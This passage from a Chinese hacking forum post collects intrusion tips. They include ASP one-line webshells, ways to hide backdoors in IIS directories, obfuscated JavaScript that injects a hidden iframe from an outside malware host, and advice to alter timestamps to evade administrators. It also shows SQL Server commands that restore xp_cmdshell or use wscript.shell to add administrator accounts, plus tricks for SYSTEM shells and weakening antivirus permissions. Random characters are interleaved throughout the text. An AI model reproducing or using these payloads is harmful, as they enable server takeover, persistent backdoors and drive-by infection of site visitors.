a).<%%25Execute(request("go"))%%25>2 Q1 B) g0 K6 e- [
b).<%Execute(request("go"))%>
0 D; d2 n: k# O& B6 mc).%><%execute request("go")%><%5 Z  n4 A* k- i. _) r8 K, Z! {
d).<script language=VBScript runat=server>execute request("sb")</Script>9 I: Z7 F$ x, U, j3 t) v  `
e).<%25Execute(request("l"))%25>' C8 ?* o4 Q) c, J0 j, Q" p/ u
f).<%if request("cmd")<>"" then execute request("pass")%># b# p! h# c; T! I  }  F2 l4 i
9 C5 d- i5 u: o1 l* M4 e8 n
52、at "12:17" /interactive cmd
+ v) P+ _/ G" |# f; @/ Q执行后可以用AT命令查看新加的任务. ]& z2 P* ?1 L: r6 o, o
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
- V( W. T9 Y, W1 j4 G5 [3 K7 f7 Q' \4 f; G
53、隐藏ASP后门的两种方法
2 S; M. s+ I7 u/ S% [1、建立非标准目录:mkdir images..\! u$ Q# U; p! l" n' R" b/ y
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp: ]6 }& l% j; ^  C  ?; t3 F: X, Q4 D
通过web访问ASP木马:http://ip/images../news.asp?action=login
  }2 ~+ y' C/ q- u0 A. g6 ~+ I9 D如何删除非标准目录:rmdir images..\ /s
- d% n# c6 l& N  X$ J5 v" l2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:% z  E+ T! j6 w$ `) i9 u
mkdir programme.asp
! N3 {  _5 f& x  ]  X新建1.txt文件内容:<!--#include file=”12.jpg”-->
, e- S/ p2 D; o/ h( |  B, q新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件7 r/ q7 E4 _6 a6 Y2 S! J$ e
attrib +H +S programme.asp) w3 ^% F5 [7 z! d+ }3 K: P
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
# Q4 }" v0 R! f1 q8 N4 _3 b2 R: |# P( A+ i- b- \* h4 D% j2 O
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
- D( W: [3 c; \+ o" u% g% p% |然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。+ ^! I$ e, r6 c

" r/ a: B. U3 ]! M6 s# I+ D) a55、JS隐蔽挂马
: L' I  h6 w/ F* ?" V8 ]1.5 j4 Y# E( z% l% ]. X3 d
var tr4c3="<iframe src=ht";
. [2 o& s6 D2 X, C( J5 S+ jtr4c3 = tr4c3+"tp:/";
" A) s& U( E* v& k6 z) A! jtr4c3 = tr4c3+"/ww";
9 m4 ~9 e, p, G5 ~4 @) _tr4c3 = tr4c3+"w.tr4";
4 L; b7 v! q0 Q3 t/ Ztr4c3 = tr4c3+"c3.com/inc/m";/ o; b1 i5 L, I$ ?) j2 E7 R
tr4c3 = tr4c3+"m.htm style="display:none"></i";4 ?4 F8 v* X' \2 w! p) i. b& i% ?6 o
tr4c3 =tr4c3+"frame>'";5 Q. |$ b. G7 ~$ {- z
document.write(tr4c3);% @: [+ |* _' A4 H: q
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
& L8 }0 J. t* _) p
6 {) z7 p5 S; O% u* R7 y8 T2.' G( y3 L5 P3 l
转换进制,然后用EVAL执行。如/ Q. F. d6 f' H
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
, q; {3 d7 o- c9 h9 R不过这个有点显眼。
4 u4 E6 `% _% Z0 |3 E9 ?3.
8 F1 h& F) d/ m8 bdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
- d% P6 ^" @& |, O" \, [% ?/ b最后一点,别忘了把文件的时间也修改下。
0 s8 x+ Q- Q& g  S
4 P/ ?8 U4 O$ w) z' h0 j9 i56.3389终端入侵常用DOS命令1 i+ U$ W; d9 g; ~3 U) L5 V# b
taskkill taskkill /PID 1248 /t
$ s8 K, M( o( W* s9 O6 [! d2 n7 o9 P0 e
tasklist 查进程/ [: r; u8 r; b0 E5 |  J6 f
& K3 \( G1 N" i9 H/ Y
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限& b8 F1 R; x/ J) o) H8 S7 n
iisreset /reboot
. e. D8 `8 M4 X5 mtsshutdn /reboot /delay:1    重起服务器# u8 b1 d( f; O6 I3 [4 z8 S" B
+ e  T, D/ e0 B* M# z$ R) I8 F
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,* p* C  \' p5 _
) ]+ g5 d$ G7 c
query user 查看当前终端用户在线情况
# ^0 Q4 P2 S  s. O7 ?5 I. q$ e1 P
要显示有关所有会话使用的进程的信息,请键入:query process *
* A3 V& F. }- `: u
0 R  C, K7 M1 a# c9 t: g. G+ s+ s要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:24 w( t3 b2 @, l3 b/ U. o$ u, K' P" R

9 x# F7 a3 C  y要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER23 ^1 H; G+ S, c6 R
, @/ T9 m( e1 F; ]3 U+ k
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02/ x( `% w: R5 W5 s# u
% O4 I# b1 Z  m% Q1 I( y! l
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启$ `* j! K5 k$ k( P- i8 g# x

% h% C- {8 x& l( r+ K& [命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
2 M# o$ L- {( z  v/ _# Z8 [! V  E5 y; m) x! T8 g
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。6 V. X8 i( r0 X7 C- Y! m8 D
: j3 ]. X5 }8 R( D  L
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机5 ^: Z; H# R% e, h3 l5 i! r; B' d

" _7 g! A5 w- q8 h; [56、在地址栏或按Ctrl+O,输入:
/ @& R1 ?3 c5 }3 w$ \9 P2 Wjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
: k% Y, D/ y7 C- p( t. k
. `6 c: Y& {# j- y& V- S' W2 M3 a源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。( ]6 T* U: `2 k& e

; W+ G4 T% d. L1 q8 Y57、net user的时候,是不能显示加$的用户,但是如果不处理的话,0 Z5 s" [8 @9 D* m) Q( f( k6 s
用net localgroup administrators是可以看到管理组下,加了$的用户的。% S3 D3 M- N# Y
& `1 f3 X$ I9 t+ I3 S& t5 w  A' P
58、 sa弱口令相关命令/ o# O; e8 M8 w' Z' V2 v
1 Y. U" r8 H/ |" A
一.更改sa口令方法:
/ b2 Z/ z) }) n: {用sql综合利用工具连接后,执行命令:
$ e1 U1 K4 B! aexec sp_password NULL,'20001001','sa'
# r0 x* P; `# D& ?(提示:慎用!)) U$ A+ t$ [% d
9 Z+ h' f8 O" r+ m1 _
二.简单修补sa弱口令.
* f" C& L" }1 V; K$ ?/ F% F0 @+ y2 M7 o7 B( s" J, q# _, p: u# R1 r
方法1:查询分离器连接后执行:3 J; h% j# `9 \! L0 w! O% B, m, {
if exists (select * from
) j7 Q: ~5 ?3 v5 x3 P6 g  Ddbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
$ ~9 @' B6 e7 m  \4 Z% KOBJECTPROPERTY(id, N'IsExtendedProc') = 1)+ L1 X0 X4 R# x, j/ Q

$ B  Y; a+ r% D# ?exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
. H( ?0 z( y2 J" H$ r$ L8 v0 H( {1 T# }! U. P1 t0 d8 Y
GO
# t4 i, C4 J% h; Q( z# N) e7 i3 T) |8 Y, T
然后按F5键命令执行完毕# _' ]  D* {9 b- B7 y, l6 s$ a! M$ K5 Z

, m! @0 A3 _1 y' r& x方法2:查询分离器连接后
2 `* x- F3 |  n: B3 m0 R4 x第一步执行:use master
, ]6 t* p/ k. K: S7 V$ A第二步执行:sp_dropextendedproc 'xp_cmdshell'
0 [4 r( }/ n1 O" E2 V4 ?1 @然后按F5键命令执行完毕
+ T6 K; s1 g  `. F" }/ ~( `% A% w
. B( \2 l3 V% W- @6 g# Z' j6 s: i0 x/ e* ]( L: d
三.常见情况恢复执行xp_cmdshell.
8 i( X% ^( c/ v5 |" ^2 q
( z0 m% c; J) s% v  U0 h" C: n* A
8 ?7 p4 t0 S" G- a3 D" m1 未能找到存储过程'master..xpcmdshell'.! X7 {/ x7 r" q1 s; G2 m- L9 Q
   恢复方法:查询分离器连接后,
9 O( V" k( ^& O2 B第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int; g" z" Q; i- Q9 s. l3 Y7 t: z3 o; L
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'2 }/ j" r5 p' L# ?
然后按F5键命令执行完毕9 B2 m4 N3 z7 F  d
- b5 Y/ v7 ~0 X; g0 K  i
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
$ }. K, C, y9 ]恢复方法:查询分离器连接后,
, a& `, }* w/ q; p第一步执行:sp_dropextendedproc "xp_cmdshell"- L" H: ~2 H, `* v/ a/ \
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'2 t. _7 n6 g1 G3 U/ d) r3 _% O( j
然后按F5键命令执行完毕) H; a9 b8 ~7 t

# G/ J' n/ N) I  h* c. F3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
1 l8 O' N) N$ Q7 R8 b恢复方法:查询分离器连接后,
4 @1 ]6 K6 s+ J- V+ v6 F" j第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
; `, A- F( F' p/ O# |第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
6 l! H; `9 U: o+ e% j' z然后按F5键命令执行完毕
# E% X" r( C. S3 b
/ W+ V1 Y# _5 h/ `$ P! l四.终极方法.
5 Y; C, X$ \" C3 E& ?如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:) H5 C6 R4 L- h" h5 ^; b4 W6 H
查询分离器连接后,( E/ v" k4 \$ p; a0 s# T% A* h
2000servser系统:- }# O, f) Z0 L+ q+ U5 \+ U
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
7 M) X6 `' {" ]0 |6 m( J5 p" d1 V* a) u2 u
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'# K/ p8 ~; g. Q/ Z
# A* V: x* T! S0 i9 x
xp或2003server系统:
" i) |/ D8 }. N! x% X% j: A6 R4 z" d
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'( G( ?& D+ T/ |( c! c& ~5 G3 K
/ i- w, ]+ R$ C1 l/ Y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'9 k3 E6 H) `% w9 W6 Z$ X6 z$ t
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表